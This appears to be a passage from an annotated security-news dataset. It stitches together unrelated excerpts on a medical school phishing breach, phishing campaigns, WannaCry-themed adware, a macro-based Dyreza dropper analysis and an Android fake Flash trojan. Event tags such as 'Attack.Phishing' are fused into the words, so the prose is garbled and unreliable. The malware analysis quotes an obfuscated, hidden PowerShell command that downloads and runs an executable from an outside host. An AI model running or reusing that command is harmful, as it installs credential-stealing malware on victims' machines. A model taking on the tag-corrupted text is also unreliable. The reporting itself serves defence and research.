by an unauthorized third party due to an email “ phishing ” incident . On January 24 , 2017 , the medical school learned that some of its employees responded to a Dec 2 , 2016 , “ phishing ” email , believing it to be a legitimate request . A “ phishing ” email is designed to look likeAttack.Phishinga legitimate email but tricksAttack.Phishingthe recipient into taking some action , such as providing login credentials . Upon learning of the incident , we secured the email accounts and began an investigation . The investigation could not rule out that an unauthorized third party may have gained accessAttack.Databreachto some employees ’ email accounts . We conducted a detailed review of the employees ’ email accounts and confirmed that some of the emails contained patient information , which may have included names , birth dates , medical record numbers , diagnosis and treatment information , other clinical information , and in some instances Social Security numbers . We reported the phishing incidentAttack.Phishingto law enforcement and are cooperating with the investigation . We have no indication that the information in the emails has been misused . However , as a precaution , we began mailing letters to affected patients on March 24 , 2017 , and have established a dedicated call center to answer any questions patients may have . If you believe you may be affected and have not received a letter by April 24 , 2017 , or if you have any questions regarding this incident , please call 844-641-5630 . The call center is open Monday through Friday from 9 a.m. to 5 p.m. central time . We regret any inconvenience this incident may have caused our patients . To help prevent such incidents in the future , we are reinforcing education with our staff and faculty of existing protocols and university resources regarding “ phishing ” emails . We also are reviewing enhancements to strengthen our business practices and user login authentication process .
PhishingAttack.Phishingtakes place when a fraudster tricksAttack.Phishingan individual into sharing sensitive information ( account numbers , Social Security numbers , login credentials , etc . ) by way of fraudulent emails , texts , or counterfeit websites . PhishingAttack.Phishingcan also enable a scammer to gain access to a computer or network so that they can install malware , such as ransomware , on a victim 's computer . Phishers are able to achieve this by spoofingAttack.Phishingthe familiar , trusted logos of established , legitimate companies . Or , they may pose asAttack.Phishinga friend or family member and are often successful in completely deludingAttack.Phishingtheir targets . In carrying out attacks , Dark Caracal uses trojanized WhatsApp and Facebook apps to try to lureAttack.Phishingusers into clicking malicious links and downloading Android malware , called Pallas , which can collect vast amounts of data . Dark Caracal targets include governments , military organizations , utilities , financial institutions , manufacturing companies and defense contractors . Stealth Mango ( Android ) and Tangelo ( iOS ) , discovered by Lookout Security Intelligence , are surveillanceware tools that target government officials , diplomats , activists and military personnel , specifically in Pakistan , Afghanistan , Iraq , India and the UAE . According to Lookout Security , “ data from U.S. , Australian , and German officials and military have been swept up in the campaign we believe is being run by members in the Pakistani military. ” Fake eFax email deceivesAttack.Phishingemail recipients by telling them they have received ‘ a new eFax ’ and that they need to click on a link button in the email to retrieve the document . The link goes to a phishing page . This is not a new attack , but has recently been spotted in emails again . Email filtering company , Mailguard , has picked upAttack.Phishinga fake E-Toll notification containing an infected .doc file . According to Mailguard , the file contains a malicious macro that will download malware to the victim ’ s computer . The notification also includes the logos of Microsoft Office and Mailguard in order to appearAttack.Phishingauthentic . It even goes as far as to claim that , “ this document is protected by MailGuard '' . DHL branding was mimickedAttack.Phishingand fake shipping notifications were sent outAttack.Phishing, asking recipients to download an attached file that contained highly destructive trojan malware . “ MEWKitAttack.Phishing” is a phishing attackAttack.Phishingthat directly steals Ethereum from users of MyEtherWallet . Using MyEtherWallet as baitAttack.Phishing, it attempts to trickAttack.PhishingEthereum investors into logging in to the bogus , cloned version of the website in order to steal their credentials . Gmail ’ s new Confidential Mode may invite link-baiting phishing attacksAttack.Phishing. According to analysis by ComputerWorld , “ Confidential Mode works by storing your email in a secure space on Google servers in the cloud . When both sender and recipient use Gmail , the email appears normal . But recipients who do not use Gmail get a link for viewing the email in a browser . The messages you send or receive via Confidential Mode are not actually email . The link is an email , but the message is an email-looking page on the internet that ’ s password-protected . Emails containing the link can , in fact , be forwarded , but only the intended recipient can successfully open the link . When someone gets one of these forwarded mails , they ’ re prompted for their Google login username and password to determine whether or not they ’ re the intended recipient . This is problematic , because it invites link-baiting phishing attacksAttack.Phishing, which could con people into revealing their login information . ” A phishing campaignAttack.Phishingtargeting Apple users seeks to dupeAttack.Phishingvictims into updating their profiles in preparation for the EU ’ s General Data Protection Regulation ( GDPR ) policies , which go into effect on May 25 . This is just one of many scams exploiting the coming implementation of GDPR policies .
Since last Friday , over 200,000 victims in 150 countries have been hitAttack.Ransomby a massive , international ransomware cyberattackAttack.Ransomcalled WannaCry . Ransomware is a type of malware that works by seizing control of and blocking access to a computer ’ s files , programs , and operations . Users are then informed that they must payAttack.Ransoma certain amount in order to regain access to their files , with the threat of permanently losing all of their data if they choose not to payAttack.Ransom. In the WannaCry attackAttack.Ransom, users were given three days to make the paymentAttack.Ransombefore the fee increased , and seven days before the files would be lost forever . The massive scope and potential financial impact of the WannaCry attackAttack.Ransomhas understandably caused a lot of panic , and companies and individuals alike have been rushing to protect their devices . However , this frenzy has opened up new damaging routes for fraud . One of these attack routes is through mobile applications that have been found on third-party application stores . There are various mobile applications advertising that they can be used to protect users from the WannaCry ransomware . However , our analysts found that some of these apps contained adware meant to infect the devices they are downloaded onto . Rather than protecting users ’ devices , they are causing them harm . The adware found is classified as Adware.mobidash , which is a module that attackers used to include into Android games and apps and monetize them . This adware has the capability to load webpages with ads , show other messages in the status bar , and modify the DNS server . This is quite dangerous as the real risk lies in the fact that the end user ’ s device is performing unwanted activity without their authorization . To hide this dangerous behavior , the adware doesn ’ t start to perform its malicious activity immediately ; instead , it lies latent in the device before activating after a short period of time . We have blogged a lot about digital trust , fake news , and all sorts of tricksAttack.Phishingthat criminals use to get the attention of consumers to get them to click on a link . Yet we continue to be amazed by how sophisticated the manipulation of the human factor has become . It will only be a matter of time until we see the WannaCry malware expand further to trickAttack.Phishingend users into installingVulnerability-related.PatchVulnerabilitya patch that allegedly prevents the new massive ransomware attackAttack.Ransom. However , this time it will not be a patch , but a new version or variant of a financially motivated malware .
Cyberthreats are a constant risk and affect public administrations significantly . So much so that they have become a powerful instrument of aggression against public entities and citizens . They can lead to a serious deterioration in the quality of service , and also , above all , to data leaksAttack.Databreachconcerning everything from personal information to state secrets . The combination of new technologies and the increase in the complexity of attacks , as well as the professionalization of cybercriminals , is highly dangerous . Last December , a large-scale spam campaign spanning more than ten countries was carried out , and specifically targeted a major European ministry . The attackAttack.Phishing, via phishingAttack.Phishing, was highly advanced and combined social engineering tactics with a powerful Trojan . The attackAttack.Phishingis sentAttack.Phishingby email with an attached Word document . At first , we suspected that it was a targeted attack , since the message came , supposedly , from a healthcare company and the recipient was an employee of the Ministry of Health in a European country . The present analysis describes the technical features of the harmful code found in the macro of the Word document . The goal of the macro was to download and run another malicious component . Below are shown a few static properties of the analyzed files . The hash of the Word document is the following : MD5 : B480B7EFE5E822BD3C3C90D818502068 SHA1 : 861ae1beb98704f121e28e57b429972be0410930 According to the document ’ s metadata , the creation date was 2016-12-19 . The malicous code ’ s signature , downloaded by Word , is the following : MD5 : 3ea61e934c4fb7421087f10cacb14832 SHA1 : bffb40c2520e923c7174bbc52767b3b87f7364a9 The Word document gets to the victim ’ s computer by way of a spam email coming fromAttack.Phishinga healthcare company . The text tricksAttack.Phishingthe recipient into beleiving that the content is protected and needs to run the macro in order to gain access to it . According to the data recovered by Panda Security ’ s Collective Intelligence , this spam campaign took place on December 19 , 2016 and affected several countries . Interactions with the infected system The basic function of the macro consists in downloading and running another malicious code from a URL embedded in the macro itself . Also , the macro is designed to run immediately upon being opened . Part of the obfuscated code contained in the macro Once the macro is running , the Word doc runs the following command in the system : cmd.exe /c pOWeRsHELL.EXe -eXecUTIONpolICy BYPAss -noPrOfIlE -winDowsTyle hidDEN ( NeW-oBjECt sYstEm.NeT.webcLiENt ) .DOWNloAdFILE ( ‘ http : //xxxxxxxxxxxx.com/13obCpHRxA1t3rbMpzh7iy1awHVm1MzNTX.exe ’ , ’ C : \Users\ ? ? ? ? \AppData\Roaming.eXe ’ The system symbol ( cmd.exe ) runs the powershell with two embedded commands going through parameters : Thanks to the data obtained by the Intelligence Collective at Panda Security , we know that the last malicious code to be distributed by this campaign is a variant of the Dyreza family . Panda ’ s clients were protected proactively , without need of signatures or updates . The purpose of the malicious code is to stealAttack.Databreachcredentials from browsers and add the compromised machine to bot network . It then waits for commands from the Command & Control Server . These commands come from the cybercriminals that operate it , and is able to download further new malware and carry out all kinds of malicious actions . Digitization in Public Administration leads to the exponential growth of the creation , storage and management of huge quantities of confidential data — data that does not allow for a single oversight
Malware tricksAttack.Phishingusers into opening Android Accessibility menu , enabling the attacker to mimicAttack.Phishingusers ' clicks and select anything displayed on their screen . The Android Trojan can mimic the user 's clicks and actions . A new form of Trojan malware targeting Android smartphones is dupingAttack.Phishingvictims into downloading a fake security update for Adobe Flash Player , which then makes them even more susceptible to malicious software . The malware is ultimately designed to monitor the users ' activity for the purposes of stealing dataAttack.Databreach, mimicking their actions in order to generate funds from fraudulent adware installations , and enabling the installation of various other types of malware -- including ransomware . Detected by researchers at security company ESET , the Trojan malware targets all versions of Google 's mobile operating system and aims to trickAttack.Phishingvictims into granting it special permissions which it uses to download additional malware . Users should also be wary of apps which appear to ask for many more permissions then they might need . For those who 've already fallen victim to this malware , they can attempt to remove the malware by manually uninstalling the 'Flash-Player ' app from their phone . However , more work may need to be done to completely remove malicious software from the device . `` Unfortunately , uninstalling the downloader does n't remove malicious apps the downloader might have installed . As with the downloader itself , the best way for cleaning up the device is using a mobile security solution , '' says Štefanko .